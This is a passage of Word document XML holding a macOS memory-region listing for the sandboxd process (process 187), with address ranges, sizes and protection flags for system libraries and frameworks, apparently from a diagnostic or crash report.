        <w:t>Output report format:  2.3  -- 64-bit process</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 Non-writable regions for process 187</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>REGION TYPE                      START - END             [ VSIZE] PRT/MAX SHRMOD  REGION DETAIL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00000001079e4000-00000001079ed000 [   36K] r-x/rwx SM=COW  /usr/libexec/sandboxd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__LINKEDIT             00000001081f0000-00000001081f5000 [   20K] r--/rwx SM=COW  /usr/libexec/sandboxd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t xml:space="preserve">MALLOC (admin)         00000001081f6000-00000001081f7000 [    4K] r--/rwx SM=ZER  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">MALLOC (admin)         00000001081f8000-00000001081f9000 [    4K] ---/rwx SM=NUL  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t xml:space="preserve">MALLOC (admin)         000000010820e000-0000000108210000 [    8K] ---/rwx SM=NUL  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t xml:space="preserve">MALLOC (admin)         0000000108225000-0000000108226000 [    4K] ---/rwx SM=NUL  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t xml:space="preserve">MALLOC (admin)         0000000108226000-0000000108227000 [    4K] r--/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>STACK GUARD            0000000108227000-0000000108228000 [    4K] ---/rwx SM=NUL  stack guard for thread 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t xml:space="preserve">VM_ALLOCATE            000000010823e000-000000010823f000 [    4K] r--/rw- SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>STACK GUARD            00000001082c2000-00000001082c3000 [    4K] ---/rwx SM=NUL  stack guard for thread 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t xml:space="preserve">MALLOC (admin)         00000001083c8000-00000001083c9000 [    4K] r--/rwx SM=ZER  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t xml:space="preserve">MALLOC (admin)         00000001083ca000-00000001083cb000 [    4K] ---/rwx SM=NUL  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t xml:space="preserve">MALLOC (admin)         00000001083e0000-00000001083e2000 [    8K] ---/rwx SM=NUL  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t xml:space="preserve">MALLOC (admin)         00000001083f7000-00000001083f8000 [    4K] ---/rwx SM=NUL  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t xml:space="preserve">Stack                  00007fff5421c000-00007fff57a1c000 [ 56.0M] ---/rwx SM=NUL  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff6d2be000-00007fff6d2f5000 [  220K] r-x/rwx SM=COW  /usr/lib/dyld</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__LINKEDIT             00007fff6d32e000-00007fff6d342000 [   80K] r--/rwx SM=COW  /usr/lib/dyld</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff87cb3000-00007fff87cb6000 [   12K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/login.framework/Versions/A/Frameworks/loginsupport.framework/Versions/A/loginsupport</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff87d64000-00007fff87d67000 [   12K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/OAuth.framework/Versions/A/OAuth</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff87d67000-00007fff87d76000 [   60K] r-x/r-x SM=COW  /System/Library/Frameworks/OpenGL.framework/Versions/A/OpenGL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff87d93000-00007fff87d9d000 [   40K] r-x/r-x SM=COW  /usr/lib/system/libsystem_pthread.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff87ea1000-00007fff8811c000 [ 2540K] r-x/r-x SM=COW  /System/Library/Frameworks/CoreData.framework/Versions/A/CoreData</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff8811c000-00007fff88177000 [  364K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/LanguageModeling.framework/Versions/A/LanguageModeling</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff88b5b000-00007fff88b67000 [   48K] r-x/r-x SM=COW  /System/Library/Frameworks/OpenGL.framework/Versions/A/Libraries/libGL.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff893f0000-00007fff894d4000 [  912K] r-x/r-x SM=COW  /usr/lib/libcrypto.0.9.8.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff894e0000-00007fff894e1000 [    4K] r-x/r-x SM=COW  /System/Library/Frameworks/ApplicationServices.framework/Versions/A/ApplicationServices</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>__TEXT                 00007fff894e1000-00007fff894e2000 [    4K] r-x/r-x SM=COW  /System/Library/Frameworks/Accelerate.framework/Versions/A/Frameworks/vecLib.framework/Versions/A/vecLib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff8951c000-00007fff89549000 [  180K] r-x/r-x SM=COW  /usr/lib/libsandbox.1.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff89549000-00007fff8957c000 [  204K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/CoreDaemon.framework/Versions/B/CoreDaemon</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff8957c000-00007fff895c3000 [  284K] r-x/r-x SM=COW  ...eworks/ApplicationServices.framework/Versions/A/Frameworks/ATS.framework/Versions/A/Resources/libFontRegistry.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff895c3000-00007fff89638000 [  468K] r-x/r-x SM=COW  /System/Library/Frameworks/SecurityFoundation.framework/Versions/A/SecurityFoundation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff89640000-00007fff89645000 [   20K] r-x/r-x SM=COW  /usr/lib/system/libcache.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff89645000-00007fff8964a000 [   20K] r-x/r-x SM=COW  /usr/lib/libpam.2.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff8964a000-00007fff89670000 [  152K] r-x/r-x SM=COW  /System/Library/Frameworks/ImageIO.framework/Versions/A/Resources/libPng.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff89670000-00007fff896e2000 [  456K] r-x/r-x SM=COW  /System/Library/Frameworks/IOKit.framework/Versions/A/IOKit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff89729000-00007fff89764000 [  236K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/DebugSymbols.framework/Versions/A/DebugSymbols</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff89768000-00007fff897e1000 [  484K] r-x/r-x SM=COW  /System/Library/Frameworks/SystemConfiguration.framework/Versions/A/SystemConfiguration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff897e1000-00007fff89850000 [  444K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/Heimdal.framework/Versions/A/Heimdal</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff89850000-00007fff8986c000 [  112K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/ApplePushService.framework/Versions/A/ApplePushService</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff89885000-00007fff899c3000 [ 1272K] r-x/r-x SM=COW  /System/Library/Frameworks/ImageIO.framework/Versions/A/ImageIO</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff899c3000-00007fff899d3000 [   64K] r-x/r-x SM=COW  ...brary/Frameworks/ApplicationServices.framework/Versions/A/Frameworks/LangAnalysis.framework/Versions/A/LangAnalysis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff89b10000-00007fff89f64000 [ 4432K] r-x/r-x SM=COW  /System/Library/Frameworks/Accelerate.framework/Versions/A/Frameworks/vImage.framework/Versions/A/vImage</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff89f64000-00007fff89fa6000 [  264K] r-x/r-x SM=COW  /System/Library/Frameworks/OpenGL.framework/Versions/A/Libraries/libGLU.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff89fe3000-00007fff8a83b000 [ 8544K] r-x/r-x SM=COW  /System/Library/Frameworks/CoreGraphics.framework/Versions/A/CoreGraphics</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff8a842000-00007fff8a8e2000 [  640K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/AppleJPEG.framework/Versions/A/AppleJPEG</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff8a8e2000-00007fff8a909000 [  156K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/ChunkingLibrary.framework/Versions/A/ChunkingLibrary</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>__TEXT                 00007fff8a909000-00007fff8a99b000 [  584K] r-x/r-x SM=COW  /System/Library/Frameworks/CloudKit.framework/Versions/A/CloudKit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff8ab08000-00007fff8ab13000 [   44K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/CrashReporterSupport.framework/Versions/A/CrashReporterSupport</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff8ab13000-00007fff8ab1f000 [   48K] r-x/r-x SM=COW  /usr/lib/system/libcommonCrypto.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff8ab1f000-00007fff8ac37000 [ 1120K] r-x/r-x SM=COW  /System/Library/Frameworks/Accelerate.framework/Versions/A/Frameworks/vecLib.framework/Versions/A/libvDSP.dylib</w:t>
      </w:r>
    </w:p>
